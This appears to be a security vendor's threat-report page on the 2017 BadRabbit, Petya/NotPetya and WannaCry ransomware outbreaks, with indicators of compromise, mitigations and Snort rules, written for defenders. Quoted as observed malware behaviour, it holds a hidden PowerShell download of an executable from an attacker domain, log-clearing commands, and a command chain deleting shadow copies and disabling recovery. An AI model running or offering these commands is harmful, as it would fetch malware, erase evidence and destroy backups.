MD5: b4e6d97dafd9224ed9a547d52c26ce02SHA1: 59cd4907a438b8300a467cee1c6fc31135757039SHA256: 682adcb55fe4649f7b22505a54a9dbc454b4090fc2bb84af7db5b0908f3b7806

Binary Startup Activity

 Test System is Windows 7 sp1

• 6CQZJL6EHc.exe (PID: 3464 cmdline: ‘C:\Users\user\Desktop\6CQZJL6EHc.exe’ MD5: B14D8FAF7F0CBCFAD051CEFE5F39645F)• cmd.exe (PID: 3492 cmdline: /c schtasks /Delete /F /TN rhaegal MD5: AD7B9C14083B52BC532FBA5948342B98)• schtasks.exe (PID: 3512 cmdline: schtasks /Delete /F /TN rhaegal MD5: 2003E9B15E1C502B146DAD2E383AC1E3)

 cleanup

Windows Behavior

C:\Windows\Globalization\Sorting\sortdefault.nls
– read attributes and synchronize and generic read
C:\Windows\system32\rsaenh.dll
– read attributes and synchronize and generic read
C:\Windows\system32\IMM32.DLL
– read data or list directory and execute or traverse and synchronize
C:\Windows\cscc.dat
– File attributes queried
– Return Compare (GetFileAttributesW) executed

BadRabbit Vaccine

According to Cyberreason, users can “vaccinate” their computers against BadRabbit. Note: GuidePoint has not tested this “vaccine” and all changes to any systems should be approved by your network administration teams and proper change control procedures should be followed before they are implemented.

An overview of the process contains two primary steps;
1. Create a file “C:\Windows\infpub.dat & C:\Windows\cscc.dat”
2. Go into the each of the files properties and remove all permissions to both files. When doing this, remove the inheritance so the files do not inherit the perms of the C:\Windows folder.

Detailed guide on setting up files with no permissions or a “BadRabbit Vaccine”. https://www.cybereason.com/blog/cybereason-researcher-discovers-vaccine-for-badrabbit-ransomware

BadRabbit IOCs

GuidePoint has identified additional IOCs during the course of the testing that should be incorporated into organizational defenses. These IOCs are provided below:

IPv4

5.61.37[.]209*
23.60.139[.]27*
23.50.75[.]27*
23.63.139[.]27*
185.149.120[.]3

“*” Not previously identified and discovered by GuidePoint

HASH Values

– de5c8d858e6e41da715dca1c019df0bfb92d32c0
o install_flash_player.exe
– afeee8b4acff87bc469a6f0364a81ae5d60a2add
– fbbdc39af1139aebba4da004475e8839
o Dropper
– 1d724f95c61f1055f0d02c2154bbccd3
o infpub.dat
 the main DLL
– b4e6d97dafd9224ed9a547d52c26ce02
o cscc.dat
 legitimate driver used for the disk encryption (diskcryptor.net)
– b14d8faf7f0cbcfad051cefe5f39645fo dispci.exe
 installs the bootlocker, communicates with the driver (cscc.dat)
– d41d8cd98f00b204e9800998ecf8427e (zero byte file size)

URLs

hxxp://1dnscontrol.com/flash_install.php
1dnscontrol[.]com
an-crimea[.]ru
ankerch-crimea[.]ru
argumenti[.]ru
argumentiru[.]com
bg.pensionhotel[.]com
blog.fontanka[.]ru
calendar.fontanka[.]ru
grupovo[.]bg
i24.com[.]ua
most-dnepr[.]info
novayagazeta.spb[.]ru
osvitaportal.com[.]ua
spbvoditel[.]ru
aica.co[.]jp
fontanka[.]ru
grupovo[.]bg
imer[.]ro
mediaport[.]ua
online812[.]ru
otbrana[.]com
pensionhotel[.]cz
sinematurk[.]com
t.ks[.]ua

Tor Payment URL:- caforssztxqzf2nm[.]onion

Additional References

https://isc.sans.edu/forums/diary/BadRabbit+New+ransomware+wave+hitting+RU+UA/22964/  https://gizmodo.com/bad-rabbit-ransomware-strikes-russia-and-ukraine-1819814538https://twitter.com/lorenzofb/status/922946057318871041 http://blog.talosintelligence.com/2017/10/bad-rabbit.html
https://pastebin.com/01C05L0C
https://app.any.run/tasks/9198fd01-5898-4db9-8188-6ad2ad4f0af3 http://www.zdnet.com/article/bad-rabbit-ransomware-a-new-variant-of-petya-is-spreading- warn-researchers/
https://www.welivesecurity.com/2017/10/24/kiev-metro-hit-new-variant-infamous-diskcoder- ransomware/
https://www.welivesecurity.com/2017/10/24/bad-rabbit-not-petya-back/

Bad Rabbit ransomware

BadRabbit malware


https://www.bleepingcomputer.com/news/security/bad-rabbit-ransomware-outbreak-hits-eastern-europe/
https://www.us-cert.gov/ncas/current-activity/2017/10/24/Multiple-Ransomware-Infections-Reported

Image Source: http://www.designlync.com/about.html

Cited Resources

[1] https://motherboard.vice.com/en_us/article/d3dp5q/infrastructure-for-the-bad-rabbit-ransomware-appears-to-have-shut-down

[2] http://www.zdnet.com/article/bad-rabbit-ransomware-a-new-variant-of-petya-is-spreading-warn-researchers/

[3] http://www.interfax.com/newsinf.asp?id=786280

[4 http://www.zdnet.com/article/bad-rabbit-ransomware-a-new-variant-of-petya-is-spreading-warn-researchers/

[5] https://www.facebook.com/odessa.aero/posts/704524863080360

[6] https://www.welivesecurity.com/2017/10/24/kiev-metro-hit-new-variant-infamous-diskcoder-ransomware/

[7] IOCs were identified exclusively in the GuidePoint vSOC Spot Report; “Bad Rabbit Ransomware”, Update 1, October 25, 2017

[8] Malware is software that is designed to do malicious or unauthorized activity or have unauthorized functionality

[9] https://twitter.com/GroupIB/status/922818401382346752

[10] https://twitter.com/avast_antivirus/status/922941896439291904?ref_src=twsrc%5Etfw&ref_url=https%3A%2F%2Fwww.bleepingcomputer.com%2Fnews%2Fsecurity%2Fsmall-amount-of-bad-rabbit-ransomware-victims-detected-in-the-usa%2F

[11] https://msdn.microsoft.com/en-us/library/windows/desktop/aa365233(v=vs.85).aspx

Author

Bill Corbitt, National Practice Director for Digital Forensics Incident Response & Forensic Intelligence, is a seasoned, results-oriented leader with extensive corporate, federal, and international experience, dealing with cybersecurity, forensic, and Incident Response dilemmas. In addition to his demonstrated success in aligning security results with business requirements, Bill is recognized for his abilities in implementing accurate cyber-countermeasures to protect intellectual property, reduce cybersecurity risk, and protect intellectual property on a global scale. A respected strategist within the forensic and incident response communities, Bill holds a Bachelor of Science degree in Criminal Justice from Valdosta State University.

vSOC Spot Report – Petya – Ransomware Attack

Latest Updates

2017-06-27 18:31 EDT

As details continue to come in, there is evidence that today’s ransomware outbreak was actually two different campaigns that occurred at the same time. Some of the indicators originally attributed to the Petya malware were actually indicators belonging to the second campaign which is aptly being called, NotPetya.

Exploitation of the CVE-2017-0199 the myguys.xls file attachment, and the french-cooking[.]com domain name are all related to the NotPetya/Loki campaign which was a different kind of attack aimed at banking institutions.

GuidePoint’s vSOC reported on the Petya ransomware incident as events were unfolding. Due to our goal of reporting accurate information in a timely manner some of the original information included in our SPOT report and blog post was misattributed to the NotPetya/Loki campaign that was running simultaneously. The difference in these two campaigns was not known or understood initially. We have made every attempt to update this blog post with accurate information as it has been made available.

2017-06-27 17:55 EDT

Several different security researchers have identified a method of preventing the encryption of the disk by using any available method or technology to prevent C:\windows\perfc.dat from being written to disk or executed. This method does not stop the spread of the malware, just halts the encryption functions.

As of 1730 EDT the email provider for the attacker’s wowsmith123456@posteo.net email has closed the account. This affects the ability to pay the ransom if you are infected. New variants may provide a new method of payment.

2017-06-27 15:31 EDT

Connections to the initial outbreak of the Petya ransomware has been correlated to a compromised accounting software, MeDoc, popular with many large Ukrainian businesses as well as the Ukrainian Government. Attackers compromised the update code of a recent release which helped propagate the ransomware to many different companies. The update was released at 10:30AM GMT, about an hour before the initial surge of infections was observed.

2017-06-27 15:30 EDT

New information has been made available that provides further insight into how the Petya ransomware operates. If the permissions of the logged in user are not sufficient enough to write to the Master Boot Record (MBR) the malware will attempt to encrypt files based on their extension like more traditional ransomware.

The list of file types that are encrypted: 3ds, 7z, accdb, ai, asp, aspx, avhd, back, bak, c, cfg, conf, cpp, cs, ctl, dbf, disk, djvu, doc, docx, dwg, eml, fdb, gz, h, hdd, kdbx, mail, mdb, msg, nrg, ora, ost, ova, ovf, pdf, php, pmf, ppt, pptx, pst, pvi, py, pyc, rar, rtf, sln, sql, tar, vbox, vbs, vcb, vdi, vfd, vmc, vmdk, vmsd, vmx, vsdx, vsv, work, xls, xlsx, xvd, zip.

The malware also clears system security logs to prevent further analysis using the command:

wevtutil cl Setup & wevtutil cl System & wevtutil cl Security & wevtutil cl Application & fsutil usn deletejournal /D %c:

To further protect vulnerable systems it is advised to disallow the execution of the psexec.exe program if it is not needed or to disallow non-privileged users from executing psexec.exe via GPO or other endpoint mechanisms.

2017-06-27 15:20 EDT

Blocking lateral movement of the Petya variants of ransomware can be achieved by patching the EternalBlue vulnerability (Microsoft’s Critical Security Bulletin MS17-010) and by disabling Administrative Shares via Group Policy Object (GPO). To disable ADMIN$ shares use the below process:

Create a file named adminshares.adm with the content from below, under C:\windows\inf on the server you edit your GPO’s with.

CLASS MACHINE 
CATEGORY !!category1 
CATEGORY !!category2 
POLICY !!policyname 
EXPLAIN !!DefaultSharesExplain 
KEYNAME "System\CurrentControlSet\Services\LanManServer\Parameters\" 
VALUENAME "AutoShareWks" 
VALUEON NUMERIC 1 
VALUEOFF NUMERIC 0 
END POLICY 
END CATEGORY 
END CATEGORY 
[strings] 
category1="Network" 
category2="Sharing" 
policyname="AdministrativeShares" 
DefaultSharesExplain="Enables default workstation administrative shares if enabled or disables if disabled" 

 

Next, create a new GPO and right click on administrative templates, and add the administrative template you just created.

Click machine administrative templates, go into view filtering, unselect/uncheck “Only show policy settings that can be fully managed” the setting is shown in the top picture. Basically this allows the GPO Editor to show settings, that is not within the default area of registry “preferences” – like ours. Any settings done outside “preferences” will persist if the policy is removed, unlike standard policies.

Open Administrative Templates – Network – Sharing

Enable or disable administrative shares.

2017-06-27 14:11 EDT

On Tuesday June 27, 2017, accounts of a new ransomware campaign named Petya or Petwrap, are making headlines as infections hit Kiev, Ukraine at approximately 11:30 GMT and continued to spread throughout Russia, Spain, France, UK, India, and various other countries in Europe. The Petya ransomware variant does not encrypt individual files on an infected machine like WCrypt0r from May 2017. Rather, Petya reboots the computer and overwrites the Master Boot Record (MBR) in the boot sector of the hard drive with its code demanding ransom. Without the MBR, the operating system has no directions for where to find the files it needs to boot and run. This effectively renders the entire computer useless until the ransom, $300 in Bitcoin, is paid.

Today’s Petya variant infects machines through a Microsoft Office vulnerability (CVE-2017-0199) and then moves laterally throughout the network exploiting the EternalBlue SMBv1 file-sharing protocol vulnerability as described in Microsoft’s Critical Security Bulletin MS17-010. Patching these vulnerabilities is imperative and will significantly reduce or eliminate the ability of this ransomware to impact your organization.

The Petya ransomware first appeared in early 2016, but the variant spreading through Europe and Russia today contain new code and new functions. Most notable is the use of the EternalBlue exploit to infect machines. This variant is an evolution that has combined new tactics and procedures made famous in other malware campaigns seen in 2017.

Notable companies affected by the Petya ransomware attack include (at the time of this writing):

  • Danish Shipping Company, Maersk
  • British Advertising Company, WPP
  • Russian Oil Company, Rosneft
  • Ukrainian Power Companies, Kyivenergo and Ukrenergo
  • Ukrainian Banks, National Bank of Ukraine (NBU) and Oschadbank
  • Ukrainian Mining Company, Evraz
  • Ukrainian Telecomms, Kyivstar, LifeCell, and Ukrtelecom
  • Ukrainian Nuclear Power Plant, Chernobyl

At the time of publishing this vSOC SPOT Report, there have been no confirmed active connections to any of the known indicators associated with this Petya malware variant from any vSOC subscriber network.

vSOC has obtained rules for CarbonBlack and CrowdStrike to detect this infection; vSOC Protect clients with either of these solutions are protected and monitored for the Petya variants of ransomware. vSOC Detect clients are also being monitored for all available indicators of the Petya variants by your vSOC team.

Technical Analysis

Petya’s rapid propagation is believed to be linked to the use of the exact same EternalBlue exploit that the WanaCrypt0r malware used in May 2017; attacks against the vulnerable SMBv1 file-sharing protocol. EternalBlue was released to the public after being allegedly stolen from the National Security Agency (NSA) in April 2017.

Current evidence shows that these attacks began with malicious spam emails weaponized to use the EternalBlue exploit for Microsoft Office vulnerability CVE-2017-0199 over TCP ports 445, 135, and potentially 1024-1035.

Malicious emails originate from IPs 84.200.16.242, 95.141.115.108, 111.90.139.247, 185.165.29.78 which the attackers have registered to the domains delightcaf[.]xyz, french-cooking[.]com and coffeeinoffice[.]xyz.

The mal-spam variant of this attack is predominantly coming from 84.200.16.242/myguy[.]xls and 185.165.29.78/myguy[.]xls. All traffic to the Command and Control (C2) servers is currently using HTTP as the communication protocol.

Early reports indicate the botnet distributing this malware originates from the LokiBot network. Also, additional reports state the Mischa ransomware package is included in the Petya PE, however confirmation is still forthcoming.

Latest Indicators of Compromise

2017-06-127 15:20 EDT

File Names

These files are all accessed using the runtime process WINWORD.EXE (PID3008)

  • %APPDATA%\Microsoft\Office\Recent\Order-20062017.LNK
  • %APPDATA%\Microsoft\Office\Recent\index.dat
  • %APPDATA%\Microsoft\Templates\~$Normal.dotm
  • C:\~$der-20062017.doc@Please_Read_me@.txt
  • %LOCALAPPDATA%\Microsoft\Windows\Temporary Internet Files\Content.IE5\7N5LGTOO\myguy[1].hta
  • %LOCALAPPDATA%\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{1E328F26-90AD-432F-85D6-72D24D3FC842}.tmp
  • %LOCALAPPDATA%\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{8C06767A-F061-47F9-B88B-16AA8AA0D1F2}.tmp

Command and Control (C2)

  • 200.16.242/myguy[.]xls
  • 165.29.78/myguy[.]xls

Memory Strings

  • !”#$%&'()*+,-./0123456789:;<=>
  • “$(*.046:<“j.x\
  • (\{9%EZ”B%]V\XR){y%JWbj3jiDN}~Hl:x7
  • )|xA:X+Zp@w>v)7#% M+ANqR#mXf,934 qx$}&
  • /myguy.xls
  • /n “C:\Order-20062017.doc”
  • 00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000105000000000000}}
  • 0000320a5802580201000400000000005202bc0220003600050000000902000000021c000000fb021000070000000000bc02000000000102022253797374656d0076f8032f0040311500bf05087640910b76fc7cb3044c311500040000002d010500040000002d01050004000000f0010300030000000000}{\result {
  • 1Pm\\9M2aD];Yt\[x]}Wr|]g-
  • 6iD_,|uZ^ty;!Y,}{C/h> PK ! dQ 1 word/_rels/document.xml.rels ( j0{-;@ $~

File Hash Values

  • 185.165.29.78
    • A809a63bc5e31670ff117d838522dc433f74bee
    • 078de2dc59ce59f503c63bd61f1ef8353dc7cf5f
    • bec678164cedea578a7aff4589018fa41551c27f
    • d5bf3f100e7dbcc434d7c58ebf64052329a60fc2
    • aba7aa41057c8a6b184ba5776c20f7e8fc97c657
    • 0ff07caedad54c9b65e5873ac2d81b3126754aac
    • 51eafbb626103765d3aedfd098b94d0e77de1196
  • 84.200.16.242
    • 7ca37b86f4acc702f108449c391dd2485b5ca18c
    • 2bc182f04b935c7e358ed9c9e6df09ae6af47168
    • 1b83c00143a1bb2bf16b46c01f36d53fb66f82b5
    • 82920a2ad0138a2a8efc744ae5849c6dde6b435d

Binary Details

The binary is currently signed using a certificate from Sysinternals. This will give a Certificate Name Mismatch error; however, the binary will still run in Windows. The current samples attempt to hijack an authorized session in order to spread using psexec. Several of the samples show the lateral movement functions are utilizing Windows Management Instrumentation Command-line (WMIC). Both are avenues for the malware to gain either local or Domain Administrator privileges allowing it to spread using that level of credential.

The sample was compiled for the i386 architecture specifically but appears to be functional on x64 architecture as well.

The PE imports the following DLL files for proper execution:

  • ADVAPI32.dll
  • CRYPT32.dll
  • DHCPSAPI.DLL
  • IPHLPAPI.DLL
  • KERNEL32.dll
  • MPR.dll
  • NETAPI32.dll
  • SHELL32.dll
  • SHLWAPI.dll
  • USER32.dll
  • WS2_32.dll
  • msvcrt.dll
  • ole32.dll

Powershell

The PE will attempt to execute the following script:

PowerShell -WindowStyle Hidden (New-Object System.Net.WebClient).DownloadFile(‘http://french-cooking.com/myguy.exe’, ‘%APPDATA%\<random>.exe’)

The <random> variable is a random number between 0-65535, which it will then call with the arguments 1  0 (For example %APPDATA%\10254.exe 1 0).

Additional files dropped:

  • http[:]//185.165.29.78/~alex/svchost.exe

Extortioner Contact Info:

Mitigation

vSOC recommends immediately patching the vulnerabilities described in CVE-2017-0199  and MS17-010. However, unlike the previous WCrypt0r ransomware, patching alone will not prevent the spread of this malware. Petya’s code will attempt to use a variety of methods to propagate itself including the EternalBlue vulnerability, WMIC, and Powershell.

vSOC recommends that organizations:

References:

vSOC SPOT Report – WCrypt (WanaCrypt0r 2.0) – Ransomware Attack

Latest Updates

2017-05-14 10:08 EDT

Researchers are reporting that a new variant of the WannaCrypt malware has been observed in the wild notably missing the kill switch check for the www.Iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.com domain that @MalwareTechLab registered to stop the first variant from propagating as fast. It has been speculated that the kill switch was actually a poorly implemented check to see if the malware was running in a sandbox. Even variants with the kill switch can continue to propagate and infect vulnerable networks through phishing emails or other lateral movement capabilities.

It is imperative that all Windows systems be patched. Microsoft released an out-of-band patch for deprecated operating systems to include Windows XP and Server 2003 Saturday to help thwart this campaign. vSOC will remain diligent in monitoring all client environments for signs of compromise or infection.

GuidePoint recommends disabling SMBv1 using a GPO or PowerShell script:

Via GPO

To enable or disable SMBv1 on the SMB server, configure the following registry key (a reboot is required):

Registry subkey: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\LanmanServer\ParametersRegistry entry: SMB1
REG_DWORD: 0 = Disabled
REG_DWORD: 1 = Enabled
Default: 1 = Enabled
To enable or disable SMBv2 on the SMB server, configure the following registry key:
Registry subkey:HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\LanmanServer\ParametersRegistry entry: SMB2
REG_DWORD: 0 = Disabled
REG_DWORD: 1 = Enabled
Default: 1 = Enabled

Via PowerShell

To disable SMBv1 on the SMB server, run the following cmdlet:

Set-ItemProperty -Path “HKLM:\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters” SMB1 -Type DWORD -Value 0 -Force

To enable SMBv2 and SMBv3 on the SMB server, run the following cmdlet:

Set-ItemProperty -Path “HKLM:\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters” SMB2 -Type DWORD -Value 1 -Force

2017-05-12 22:28 EDT

A UK malware researcher whose Twitter handle is @MalwareTechLab “accidentally” stopped one wide-spread variant of the ransomware from propagating further by registering a domain discovered while analyzing the code. The domain, Iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.com is a kill switch that the code sends a GET request for. If the domain is not found, the code continues and infects the host. If the domain is found the code exits and the host is not infected. As long as the domain does not get revoked or taken down, this particular variant will cease infecting new machines. New variants are likely to spring up in the coming days and weeks without this kill switch feature, so due diligence is highly recommended along with patching all vulnerable systems and disabling SMB v1.

Based on this latest information, GuidePoint recommends our original mitigation steps:

  • All systems be updated to the latest patch available from Microsoft. The patch specific to the exploit kit is labeled KB4012598 or MS17-010 and should be evaluated for deployment immediately if it has not already been applied. This will prevent the SMB traffic from exploiting the vulnerability, and eliminates initial infection vectors.
  • Application whitelisting be applied to prevent any applications from running which are not from a specified location or signed by the whitelisted vendor.
  • You create and maintain offline backups of critical data which will reduce the amount of damage a crypto- ransomware attack is capable of inflicting.
  • You ensure your antivirus definitions are up to date. Most major anti-virus vendors have been provided samples of this malware and have developed detections and definitions. Currently, approximately 31 out of 60 A/V vendors tested can recognize and stop this infection. Major vendors not included in the list include Symantec and Sophos.

Latest Indicators of Compromise

2017-05-12 22:36 EDT

File Names

  • mssecsvc.exe
  • @wanadecryptor@.exe
  • taskdl.exe
  • taskse.exe
  • tasksche.exe
  • tor.exe
  • @Please_Read_me@.txt

File Extensions

  • .wcry
  • .wncry
  • .wncryt
  • .wncy

Windows Service Name

  • mssecsvc2.0
  • Microsoft Security Center (2.0) Service

File Strings

  • Wanna Decryptor 1.0
  • Wana DecryptOr
  • Wana Decrypt0r
  • WANNACRY
  • WanaCryptOr
  • WanaCrypt0r
  • WANACRY!
  • WNcry@2o17

File Hash Values

  • ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa
  • c365ddaa345cfcaff3d629505572a484cff5221933d68e4a52130b8bb7badaf9
  • 09a46b3e1be080745a6d8d88d6b5bd351b1c7586ae0dc94d0c238ee36421cafa
  • 0a73291ab5607aef7db23863cf8e72f55bcb3c273bb47f00edf011515aeb5894
  • 428f22a9afd2797ede7c0583d34a052c32693cbb55f567a60298587b6e675c6f
  • 5c1f4f69c45cff9725d9969f9ffcf79d07bd0f624e06cfa5bcbacd2211046ed6
  • 62d828ee000e44f670ba322644c2351fe31af5b88a98f2b2ce27e423dcf1d1b1
  • 72af12d8139a80f317e851a60027fdf208871ed334c12637f49d819ab4b033dd
  • 85ce324b8f78021ecfc9b811c748f19b82e61bb093ff64f2eab457f9ef19b186
  • a1d9cd6f189beff28a0a49b10f8fe4510128471f004b3e4283ddc7f78594906b
  • a93ee7ea13238bd038bcbec635f39619db566145498fe6e0ea60e6e76d614bd3
  • b43b234012b8233b3df6adb7c0a3b2b13cc2354dd6de27e092873bf58af2693c
  • eb47cd6a937221411bb8daf35900a9897fb234160087089a064066a65f42bcd4
  • 24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c
  • 2c2d8bc91564050cf073745f1b117f4ffdd6470e87166abdfcd10ecdff040a2e
  • 7a828afd2abf153d840938090d498072b7e507c7021e4cdd8c6baf727cafc545
  • a897345b68191fd36f8cefb52e6a77acb2367432abb648b9ae0a9d708406de5b
  • fb0b6044347e972e21b6c376e37e1115dab494a2c6b9fb28b92b1e45b45d0ebc
  • 9588f2ef06b7e1c8509f32d8eddfa18041a9cc15b1c90d6da484a39f8dcdf967
  • b43b234012b8233b3df6adb7c0a3b2b13cc2354dd6de27e092873bf58af2693c
  • 4186675cb6706f9d51167fb0f14cd3f8fcfb0065093f62b10a15f7d9a6c8d982
  • 2584e1521065e45ec3c17767c065429038fc6291c091097ea8b22c8a502c41dd
  • 2ca2d550e603d74dedda03156023135b38da3630cb014e3d00b1263358c5f00d
  • 4a468603fdcb7a2eb5770705898cf9ef37aade532a7964642ecd705a74794b79

Command and Control IP’s:

  • 188.166.23.127:443
  • 193.23.244.244:443
  • 2.3.69.209:9001
  • 50.7.161.218:9001
  • 217.79.179.77
  • 128.31.0.39
  • 213.61.66.116
  • 212.47.232.237
  • 81.30.158.223
  • 79.172.193.32
  • 89.45.235.21
  • 38.229.72.16
  • 188.138.33.220
  • 146.0.32.144:9001
  • 188.166.23.127:443
  • 193.23.244.244:443

Sender IPs:

  • 205.186.153.200
  • 96.127.190.2
  • 184.154.48.172
  • 200.58.103.166
  • 216.145.112.183
  • 162.220.58.39
  • 192.237.153.208
  • 146.0.32.144
  • 188.166.23.127
  • 50.7.161.218
  • 2.3.69.209
  • 74.125.104.145
  • 75.126.5.21

Tor Onion URL’s:

  • 57g7spgrzlojinas.onion
  • 76jdd2ir2embyv47.onion
  • cwwnhwhlz52maqm7.onion
  • gx7ekbenv2riucmf.onion
  • sqjolphimrr7jqw6.onion
  • Xxlvbrloxvriy2c5.onion

Mutex:

  • ShimCacheMutex
  • Global\MsWinZonesCacheCounterMutexA0
  • MsWinZonesCacheCounterMutexA

Domains:

  • R12.sn-h0j7sn7s.gvt1.com
  • Iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.com

Email Sender:

  • alertatnb@serviciobancomer.com

Kill Switch Domain:

  • www.Iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.com

Snort Signatures:

alert tcp $HOME_NET 445 -> any any (msg:”ET EXPLOIT Possible ETERNALBLUE MS17-010 Echo Response”; flow:from_server,established; content:”|00 00 00 31 ff|SMB|2b 00 00 00 00 98 07 c0|”; depth:16; fast_pattern; content:”|4a 6c 4a 6d 49 68 43 6c 42 73 72 00|”; distance:0; flowbits:isset,ETPRO.ETERNALBLUE; classtype:trojan-activity; sid:2024218; rev:2;)

alert smb any any -> $HOME_NET any (msg:”ET EXPLOIT Possible ETERNALBLUE MS17-010 Heap Spray”; flow:to_server,established; content:”|ff|SMB|33 00 00 00 00 18 07 c0 00 00 00 00 00 00 00 00 00 00 00 00 00|”; offset:4; depth:25; content:”|08 ff fe 00 08 41 00 09 00 00 00 10|”; within:12; fast_pattern; content:”|00 00 00 00 00 00 00 10|”; within:8; content:”|00 00 00 10|”; distance:4; within:4; pcre:”/^[a-zA-Z0-9+/]{1000,}/R”; threshold: type threshold, track by_src, count 12, seconds 1; classtype:trojan-activity; sid:2024217; rev:1;)

alert smb any any -> $HOME_NET any (msg:”ET EXPLOIT Possible ETERNALBLUE MS17-010 Echo Request (set)”; flow:to_server,established; content:”|00 00 00 31 ff|SMB|2b 00 00 00 00 18 07 c0|”; depth:16; fast_pattern; content:”|4a 6c 4a 6d 49 68 43 6c 42 73 72 00|”; distance:0; flowbits:set,ETPRO.ETERNALBLUE; flowbits:noalert; classtype:trojan-activity; sid:2024220; rev:1;)

alert smb $HOME_NET any -> any any (msg:”ET EXPLOIT Possible ETERNALBLUE MS17-010 Echo Response”; flow:from_server,established; content:”|00 00 00 31 ff|SMB|2b 00 00 00 00 98 07 c0|”; depth:16; fast_pattern; content:”|4a 6c 4a 6d 49 68 43 6c 42 73 72 00|”; distance:0; flowbits:isset,ETPRO.ETERNALBLUE; classtype:trojan-activity; sid:2024218; rev:1;)
http://docs.emergingthreats.net/bin/view/Main/2024218

The ransomware encrypts files with the following extensions:

.der, .pfx, .key, .crt, .csr, .p12, .pem, .odt, .ott, .sxw, .stw, .uot, .3ds, .max, .3dm, .ods, .ots, .sxc, .stc, .dif, .slk, .wb2, .odp, .otp, .sxd, .std, .uop, .odg, .otg, .sxm, .mml, .lay, .lay6, .asc, .sqlite3, .sqlitedb, .sql, .accdb, .mdb, .dbf, .odb, .frm, .myd, .myi, .ibd, .mdf, .ldf, .sln, .suo, .cpp, .pas, .asm, .cmd, .bat, .ps1, .vbs, .dip, .dch, .sch, .brd, .jsp, .php, .asp, .java, .jar, .class, .mp3, .wav, .swf, .fla, .wmv, .mpg, .vob, .mpeg, .asf, .avi, .mov, .mp4, .3gp, .mkv, .3g2, .flv, .wma, .mid, .m3u, .m4u, .djvu, .svg, .psd, .nef, .tiff, .tif, .cgm, .raw, .gif, .png, .bmp, .jpg, .jpeg, .vcd, .iso, .backup, .zip, .rar, .tgz, .tar, .bak, .tbk, .bz2, .PAQ, .ARC, .aes, .gpg, .vmx, .vmdk, .vdi, .sldm, .sldx, .sti, .sxi, .602, .hwp, .snt, .onetoc2, .dwg, .pdf, .wk1, .wks, .123, .rtf, .csv, .txt, .vsdx, .vsd, .edb, .eml, .msg, .ost, .pst, .potm, .potx, .ppam, .ppsx, .ppsm, .pps, .pot, .pptm, .pptx, .ppt, .xltm, .xltx, .xlc, .xlm, .xlt, .xlw, .xlsb, .xlsm, .xlsx, .xls, .dotx, .dotm, .dot, .docm, .docb, .docx, .doc

Once started it immediately spawns several processes to change file permissions and communicate with tor hidden c2 servers:

attrib +h .
icacls . /grant Everyone:F /T /C /Q
C:\Users\xxx\AppData\Local\Temp\taskdl.exe
@WanaDecryptor@.exe fi
300921484251324.bat
C:\Users\xxx\AppData\Local\Temp\taskdl.exe
C:\Users\xxx\AppData\Local\Temp\taskdl.exe
The malware creates mutex “Global\MsWinZonesCacheCounterMutexA” and runs the command:
cmd.exe /c vssadmin delete shadows /all /quiet & wmic shadowcopy delete & bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no & wbadmin delete catalog -quiet

Files:

  • [Installed_Folder]\00000000.eky
  • [Installed_Folder]\00000000.pky
  • [Installed_Folder]\00000000.res
  • [Installed_Folder]\@WanaDecryptor@.exe
  • [Installed_Folder]\@WanaDecryptor@.exe.lnk
  • [Installed_Folder]\b.wnry
  • [Installed_Folder]\c.wnry
  • [Installed_Folder]\f.wnry
  • [Installed_Folder]\msg\
  • [Installed_Folder]\msg\m_bulgarian.wnry
  • [Installed_Folder]\msg\m_chinese (simplified).wnry
  • [Installed_Folder]\msg\m_chinese (traditional).wnry
  • [Installed_Folder]\msg\m_croatian.wnry
  • [Installed_Folder]\msg\m_czech.wnry
  • [Installed_Folder]\msg\m_danish.wnry
  • [Installed_Folder]\msg\m_dutch.wnry
  • [Installed_Folder]\msg\m_english.wnry
  • [Installed_Folder]\msg\m_filipino.wnry
  • [Installed_Folder]\msg\m_finnish.wnry
  • [Installed_Folder]\msg\m_french.wnry
  • [Installed_Folder]\msg\m_german.wnry
  • [Installed_Folder]\msg\m_greek.wnry
  • [Installed_Folder]\msg\m_indonesian.wnry
  • [Installed_Folder]\msg\m_italian.wnry
  • [Installed_Folder]\msg\m_japanese.wnry
  • [Installed_Folder]\msg\m_korean.wnry
  • [Installed_Folder]\msg\m_latvian.wnry
  • [Installed_Folder]\msg\m_norwegian.wnry
  • [Installed_Folder]\msg\m_polish.wnry
  • [Installed_Folder]\msg\m_portuguese.wnry
  • [Installed_Folder]\msg\m_romanian.wnry
  • [Installed_Folder]\msg\m_russian.wnry
  • [Installed_Folder]\msg\m_slovak.wnry
  • [Installed_Folder]\msg\m_spanish.wnry
  • [Installed_Folder]\msg\m_swedish.wnry
  • [Installed_Folder]\msg\m_turkish.wnry
  • [Installed_Folder]\msg\m_vietnamese.wnry
  • [Installed_Folder]\r.wnry
  • [Installed_Folder]\s.wnry
  • [Installed_Folder]\t.wnry
  • [Installed_Folder]\TaskData\
  • [Installed_Folder]\TaskData\Data\
  • [Installed_Folder]\TaskData\Data\Tor\
  • [Installed_Folder]\TaskData\Tor\
  • [Installed_Folder]\TaskData\Tor\libeay32.dll
  • [Installed_Folder]\TaskData\Tor\libevent-2-0-5.dll
  • [Installed_Folder]\TaskData\Tor\libevent_core-2-0-5.dll
  • [Installed_Folder]\TaskData\Tor\libevent_extra-2-0-5.dll
  • [Installed_Folder]\TaskData\Tor\libgcc_s_sjlj-1.dll
  • [Installed_Folder]\TaskData\Tor\libssp-0.dll
  • [Installed_Folder]\TaskData\Tor\ssleay32.dll
  • [Installed_Folder]\TaskData\Tor\taskhsvc.exe
  • [Installed_Folder]\TaskData\Tor\tor.exe
  • [Installed_Folder]\TaskData\Tor\zlib1.dll
  • [Installed_Folder]\taskdl.exe
  • [Installed_Folder]\taskse.exe
  • [Installed_Folder]\u.wnry
  • [Installed_Folder]\wcry.exe

Registry Entries:

